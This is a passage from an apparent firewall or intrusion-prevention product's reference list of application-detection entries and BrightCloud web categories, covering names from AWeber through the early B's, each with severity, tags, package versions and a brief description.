Description: The primary AWeber features include email newsletters, autoresponders, sign up forms and RSS-to-email. Users can track the performance of their email campaigns with analytics reporting and split test sign up forms and newsletters to market more effectively. Source: Wikipedia
Back to top

Awin

About this situation: Application Awin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Awin is a global affiliate network operating across the retail, telecommunications, travel and finance vertical. Awin connects contributing publishers and advertisers around the globe.
Back to top

Awinta

About this situation: Application Awinta detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Awinta provide pharmacy software in the German healthcare market. Awinta offer un with the different enterprise resource planning systems
Back to top

AWS-Partner-Portal

About this situation: Application AWS-Partner-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AWS Partner Portal is the partner program for AWS that focused on helping partners build business by providing technical, marketing and GTM support.
Back to top

AWSApps

About this situation: Amazon AWSApps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1238-5242
Description: Awsapps.com is the domain used by Amazon AWS for several of its web applications, such as WorkMail and WorkSpaces.
Back to top

Axa-tech

About this situation: Application Axa-tech detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AXA is the number one insurance global brand and has been for 6 consecutive years. AXA build partnerships with other top players
Back to top

Axcet-HR-Solutions-Employee-Portal

About this situation: Application Axcet-HR-Solutions-Employee-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Professional Employer Organization
Back to top

Axcient

About this situation: Application Axcient detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Axcient is cloud platform that eliminates data loss, keeps applications up and running, and makes sure that IT infrastructures never go down.
Back to top

Axion-Health

About this situation: Application Axion-Health detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Axion Health provides Web-based software, support and consultative services for employee health departments, occupational health services, medical surveillance programs for health systems, government agencies, and industry.
Back to top

Axosoft

About this situation: Application Axosoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Axosoft is a provider of agile project management and bug tracking tools for software development teams.
Back to top

Axway

About this situation: Application Axway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Axway, a market in governing the flow of data that enables digital business, is a software company with more than 11,000 public and private sector customers across 100 countries.
Back to top

Axxerion-Facility-Management-Information-System

About this situation: Application Axxerion-Facility-Management-Information-System detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Axxerion -is integrated business management platform.
Back to top

Azalead

About this situation: Application Azalead detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Azalead helps B2B marketers sell to target accounts faster with Account Based Marketing Software.
Back to top

Azendoo

About this situation: Application Azendoo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Azendoo is a Teamwork Application. Organize your tasks, plan your projects, share your documents and sync with your team, without email.
Back to top

Azuqua

About this situation: Application Azuqua detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Azuqua is a cloud integration platform. The Azuqua platform gives the ability to quickly build integrations between cloud-based applications.With Azuqua, you can create processes that automatically share data and updates across any cloud app.
Back to top

Azure Active Directory Broker

About this situation: Endpoint Context Agent based Azure Active Directory Broker detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-989-5242
Last changed: sgpkg-ips-989-5242
Description: Microsoft Azure Active Directory (AAD) Broker endpoint application was detected. Azure Active Directory Broker manages authentication for Azure cloud services. It is used with multiple different applications, such as Office 365 or OneDrive.
Back to top

Azure Front Door Frontend

About this situation: Azure Front Door Frontend usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1871-5242
Last changed: sgpkg-ips-1872-5242
Description: Azure Front Door is Microsoft's advanced cloud Content Delivery Network (CDN).
Back to top

Azure IoT Hub

About this situation: Azure IoT Hub usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1871-5242
Last changed: sgpkg-ips-1872-5242
Description: Azure IoT Hub is a managed service hosted in the cloud that acts as a central message hub for communication between an IoT application and its attached devices.
Back to top

Azure Security Center

About this situation: Azure Security Center usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1871-5242
Last changed: sgpkg-ips-1872-5242
Description: Azure Security Center is a security management tool.
Back to top

Azure-Stack-HCI

About this situation: Azure Stack HCI usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1803-5242
Last changed: sgpkg-ips-1814-5242
Description: Azure Stack HCI is a hyperconverged clustering solution. It uses validated hardware to run virtualized workloads on-pemisis.
Back to top

Azurepath

About this situation: Application Azurepath detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Azurepath is a cloud-based application that automates lead management, communication tracking, sales performance reporting, and cash forecasting via a user and mobile-friendly interface.
Back to top

AzureWatch

About this situation: Application AzureWatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AzureWatch is Paraleap's flagship product, designed to add dynamic scalability and monitoring to applications running on the Windows Azure cloud platform.
Back to top

B-Data

About this situation: Application B-Data detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: B-Data is a software company focusing on software development services and on the development of products and cloud solutions for integration between applications.
Back to top

B-kin

About this situation: Application B-kin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: B-kin offers on-demand tools and services to improve the sales and marketing processes of its customers.
Back to top

B-to-B-Links

About this situation: Application B-to-B-Links detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: B to B Links provides security tagging, product protection, CCTV and labelling solutions to retailers.
Back to top

BabelConnect

About this situation: Application BabelConnect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BabelConnect integrated Communications Manager
Back to top

Babelgum

About this situation: Babelgum usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Babelgum uses streaming TV technology to provide free, on-demand TV content to end users. The company aims to combine the 'immersive viewing experience' and visual quality of traditional television with the features made possible by the internet. Source: Wikipedia
Back to top

Babelway

About this situation: Application Babelway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Babelway, an Integration Platform as a Service (iPaaS), automates B2B data and document exchange for businesses, integration service providers and application vendors
Back to top

Backblaze

About this situation: Backblaze usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a global data storage and backup service that allows Windows and Mac OS X users to back up data in an off-site data center. Users can back up data continuously, manually, when the computer is idle, or on an hourly basis. Backblaze uses AES encryption for security, and data compression and bandwidth throttling to reduce the upload and download time. Source: Wikipedia
Back to top

Backerkit

About this situation: Backerkit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-630-5211
Description: Backerkit is a pledge management service for crowdfunding platforms.
Back to top

BackgroundsOnline

About this situation: Application BackgroundsOnline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Backgrounds Online - Employment Screening Resource
Back to top

BackgroundTransferHost

About this situation: Endpoint Context Agent based Windows BackgroundTransferHost detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: A network connection initiated by BackgroundTransferHost.exe process was detected. BackgroundTransferHost.exe is a Windows Download/Upload Host.
Back to top

Backpack

About this situation: Backpack usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-635-5211
Description: Backpack usage has been detected.
Back to top

Backstop-Solutions

About this situation: Application Backstop-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Backstop Solutions Group provides CRM software suites for investment managers, portfolio managers, hedge funds, funds of hedge funds, endowments, pensions, and more.
Back to top

Backup-and-Share

About this situation: Application Backup-and-Share detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Backup and Share - secure online backup and storage service
Back to top

Backup-MTC-Cloud

About this situation: Application Backup-MTC-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MTC is provider of both cloud-based and on-the-ground I.T. services for small business.
Back to top

BackupGenie

About this situation: Application BackupGenie detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BackupGenie - Cloud Storage for documents, photos, music etc. Offers unlimited online storage, syncing and file sharing.
Back to top

Backupify

About this situation: Backupify usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Backupify gives the power to find, restore, and manage any and all Google Apps data.
Back to top

BACnet

About this situation: BACnet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Description: BACnet is a building automation and control networking protocol.
Back to top

Bacula

About this situation: Bacula usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-678-5211
Description: Bacula is an open source free network backup and restore solution. The service uses a client server architecture.
Back to top

Badgeville

About this situation: Application Badgeville detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Badgeville drives business success through gamification. With hundreds of name brand customers, Badgeville brings game, reputation, and social mechanics to industry leaders and innovators including American Express, Oracle, Samsung, Bell Media, Kendall Jackson, Philips Electronics, and more.
Back to top

Badongo

About this situation: Badongo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-628-5211
Description: Badongo is an online storage, management and publishing system for personal content. Badongo is an online storage, management and publishing system for personal content. The application is available at the site https://www.badongo.com.
Back to top

Badoo

About this situation: Badoo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Baidu

About this situation: Baidu services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-769-5211
Description: Baidu search engine usage has been detected.
Back to top

Baidu-Cloud

About this situation: Baidu Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-773-5211
Description: Baidu Cloud is an online cloud storage and file sharing service which was launched by BaiDu Inc. The service can be accessed at the website http://yun.baidu.com , or through a client application for Windows, Mac PC, Android, iPhone, iPad or WP.
Back to top

Baidu-Game

About this situation: Baidu game usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to search and browse game-related news and information. Source: Wikipedia
Back to top

Baidu-Hi

About this situation: Baidu Hi usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1641-5242
Description: Baidu Hi is an Instant Messaging Computer Program which allows users to communicate with each other in real time.
Back to top

Baidu-Hi-Audio-Video

About this situation: Baidu Hi Audio/Video conversation detected
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: Baidu Hi is a proprietary instant messaging program from Baidu. It has a variety of features, such as instant messaging, file transfer, audio & video conversation and online gaming.
Back to top

Baidu-Hi-File-Transfer

About this situation: Baidu Hi file transfer detected
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-628-5211
Description: Baidu Hi is an Instant Messaging Computer Program which allows users to communicate with each other in real time and also allows users to transfer files.
Back to top

Baidu-Hi-Game

About this situation: Baidu Hi online gaming detected
Context: Application Context
Severity: 1
Tags: Protocols, Games
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-630-5211
Description: Baidu Hi is a proprietary instant messaging program from Baidu. It has a variety of features, such as instantmessaging, file transfer, audio & video conversation and online gaming.
Back to top

Baidu-Ime

About this situation: Baidu IME usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Baidu IMEs convert keystrokes into characters that are not available on users input devices.
Back to top

Baidu-Web-Messenger

About this situation: Baidu Web Messenger usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1086-5242
Description: Baidu Web Messenger is a web-based Instant Messenger which allows users to communicate with each other in real time. The service can be accessed at http://web.im.baidu.com/
Back to top

Ballpark

About this situation: Application Ballpark detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ballpark is an online time tracking and invoicing software program, provides online invoicing software that designed to track time, send invoices, receive payments.
Back to top

Balsamiq

About this situation: Balsamiq usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Balsamiq Mockups is a graphical user interface mockup builder application. It allows the designer to arrange pre-built widgets using a drag-and-drop WYSIWYG editor.
Back to top

BambooHR

About this situation: Application BambooHR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BambooHR collects and organizes all the information you gather throughout the employee life cycle, then helps you use it to achieve great things.
Back to top

Bambuser

About this situation: Bambuser usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-628-5211
Description: Bambuser is a video streaming service.
Back to top

Bandwidth

About this situation: The parent category that contains the following categories: Educational Video, Entertainment Video, Internet Radio and TV, Internet Technology, Peer-to-Peer File Sharing, Personal Network Storage and Backup, Streaming Media, Surveillance and Viral Video.
Context: URL Application Context
Severity: 1
Tags: Bandwidth, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Educational Video, Entertainment Video, Internet Radio and TV, Internet Technology, Peer-to-Peer File Sharing, Personal Network Storage and Backup, Streaming Media, Surveillance and Viral Video.
Back to top

BaoFeng

About this situation: BaoFeng usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-528-5211
Last changed: sgpkg-ips-628-5211
Description: BaoFeng (baofeng.com) is a Chinese peer-to-peer Internet video streaming application/network.
Back to top

Barclays

About this situation: Barclays usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-641-5211
Last changed: sgpkg-ips-1764-5242
Description: Barclays usage detected. Barclays is a British banking corporation.
Back to top

BariumLive

About this situation: Application BariumLive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Barium develops and delivers a Business Process Management System (BPMS) and offers business process coaching. Barium Live is our easy-to-use web service for organisations that want to improve their key processes. It is a collaborative cloud service for efficient business process modelling (using the standard notation BPMN), rapid process configuration and executable web application deployment.
Back to top

Barracuda-Backup

About this situation: Barracuda Backup usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: This service combines a plug and play appliance for onsite backups with cloud storage or private cloud disc based replication to securely store data in multiple locations off-site. Source: Wikipedia
Back to top

Barracuda-Email-Security-Service

About this situation: Barracuda Email Security Service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-1764-5242
Description: This email service protects both inbound and outbound email against spam, viruses, worms, phishing, and denial of service attacks. BESS is designed for businesses with 50 or more users who host their own email but want spam and virus filtering in the cloud. Source: Wikipedia
Back to top

Base-CRM

About this situation: Base CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to access s a customer relationship management (CRM) system that is available for iOS, Android, and Windows Phones. Source: Wikipedia
Back to top

Basecamp

About this situation: Basecamp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-630-5211
Description: Basecamp is a web-based project management and collaboration tool developed by 37signals.
Back to top

BaseKit

About this situation: Application BaseKit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BaseKit is the website editor distributed by hosting, telco and internet companies.
Back to top

BasicSafe

About this situation: Application BasicSafe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Basicsafe is an internet based integrated approach to managing safe work cultures and compliance with regulatory requirements.
Back to top

Basso

About this situation: Basso usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-628-5211
Description: Chillstep is an internet radio and media service.
Back to top

Basware

About this situation: Application Basware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Basware provide purchase-to-pay and e-invoicing solutions in the world of commerce. Empower companies to unlock value across their financial operations by simplifying and streamlining key financial processes.
Back to top

Batchbook

About this situation: Batchbook usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Batchbook allows you to keep track of your contacts originating from more than one source and share them with others.
Back to top

Battelle

About this situation: Application Battelle detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Battelle conducts research and development, designs and manufactures products, and delivers critical services for government and commercial customers.
Back to top

Battle.net

About this situation: Battle.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-751-5211
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Battlefieldheroes

About this situation: Battlefieldheroes usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a gaming service that allows users to play games.or obtain gaming information.
Back to top

Battlegrounds

About this situation: Battlegrounds usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Description: PlayerUnknown's Battleground is an online multiplayer game.
Back to top

Bazaarvoice

About this situation: Bazaarvoice usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-773-5211
Description: Bazaarvoice is a company that provides service to facilitate customer reviews, questions and other user generated content.
Back to top

BBC

About this situation: BBC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-630-5211
Description: BBC is British public radio and television service.
Back to top

BBC-iPlayer

About this situation: BBC iPlayer Radio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-630-5211
Description: BBC iPlayer is a web service provided by bbc.com for watching BBC TV channels and other video content provided by BBC.
Back to top

BBC-iPlayer-Radio

About this situation: BBC iPlayer Radio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-630-5211
Description: BBC iPlayer Radio is a web service provided by bbc.com for listening radio channels.
Back to top

BCA

About this situation: Application BCA detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: BCA
Back to top

BC_Abortion

About this situation: BrightCloud category Abortion
Context: HTTP BrightCloud Category
Severity: 1
Tags: Society / Education / Religion, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Abortion". The category is described as follows: Abortion topics, either pro-life or pro-choice. Examples include: * http://geocities.com/disangels/sent.html * http://prochoiceamerica.org $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Abused-Drugs

About this situation: BrightCloud category Abused Drugs
Context: HTTP BrightCloud Category
Severity: 1
Tags: Drugs, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Abused Drugs". The category is described as follows: Discussion or remedies for illegal, illicit, or abused drugs such as heroin, cocaine, or other street drugs. Information on "legal highs": glue sniffing, misuse of prescription drugs or abuse of other legal substances. Examples include: * http://shroomery.org * http://passyourdrugtest.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Access-Unauthorized

About this situation: BrightCloud Categorization Access Unauthorized
Context: HTTP BrightCloud Category
Severity: 5
Tags: BrightCloud System Situations
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1505-5242
Description: The configuration requires BrightCloud categorization for the web pages, but the server returns "unauthorized" error. This could be a license configuration problem. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Adult-and-Pornography

About this situation: BrightCloud category Adult and Pornography
Context: HTTP BrightCloud Category
Severity: 1
Tags: Pornography / Nudity, Legal Liability, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Adult and Pornography". The category is described as follows: Sexually explicit material for the purpose of arousing a sexual or prurient interest. Adult products including sex toys, CD-ROMs, and videos. Online groups, including newsgroups and forums, that are sexually explicit in nature. Erotic stories and textual descriptions of sexual acts. Adult services including videoconferencing, escort services, and strip clubs. Sexually explicit art. Examples include: * http://playboy.com * http://geocities.com/glasses_fetish $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Alcohol-and-Tobacco

About this situation: BrightCloud category Alcohol and Tobacco
Context: HTTP BrightCloud Category
Severity: 1
Tags: Drugs, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Alcohol and Tobacco". The category is described as follows: Sites that provide information on, promote, or support the sale of alcoholic beverages or tobacco products and associated paraphernalia. Examples include: * http://cigarettesamerica.com * http://wineinsiders.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Auctions

About this situation: BrightCloud category Auctions
Context: HTTP BrightCloud Category
Severity: 1
Tags: Purchasing, Productivity Loss
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Auctions". The category is described as follows: Sites that support the offering and purchasing of goods between individuals as their main purpose. Does not include classified advertisements. Examples include: * http://ebay.com * http://trademe.co.nz $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Bot-Nets

About this situation: BrightCloud category Bot Nets
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Security Risk
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Bot Nets". The category is described as follows: These are URLs, typically IP addresses, which are determined to be part of a Bot network, from which network attacks are launched. Attacks may include SPAM messages, DOS, SQL injections, proxy jacking, and other unsolicited contacts. $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Business-and-Economy

About this situation: BrightCloud category Business and Economy
Context: HTTP BrightCloud Category
Severity: 1
Tags: Business / Services, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Business and Economy". The category is described as follows: Business firms, corporate websites , business information, economics, marketing, management, and entrepreneurship. Examples include: * http://boeing.com * http://honda.com $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Cheating

About this situation: BrightCloud category Cheating
Context: HTTP BrightCloud Category
Severity: 1
Tags: Risk / Fraud / Crime, Legal Liability
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1505-5242
Description: The web page belongs to the BrightCloud category "Cheating". The category is described as follows: Sites that support cheating and contain such materials, including free essays, exam copies, plagiarism, etc. Examples include: * http://wowessays.com/ * http://freeessays.cc $([[defined( $LN_HTTP_REQUEST_HOST ) ? " HTTP Request Host: " : ""]])$([[defined( $LN_HTTP_REQUEST_HOST ) ? $LN_HTTP_REQUEST_HOST : ""]])
Back to top

BC_Computer-and-Internet-Info

About this situation: BrightCloud category Computer and Internet Info
Context: HTTP BrightCloud Category
Severity: 1
Tags: Information / Technology, Business Usage
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1505-5242
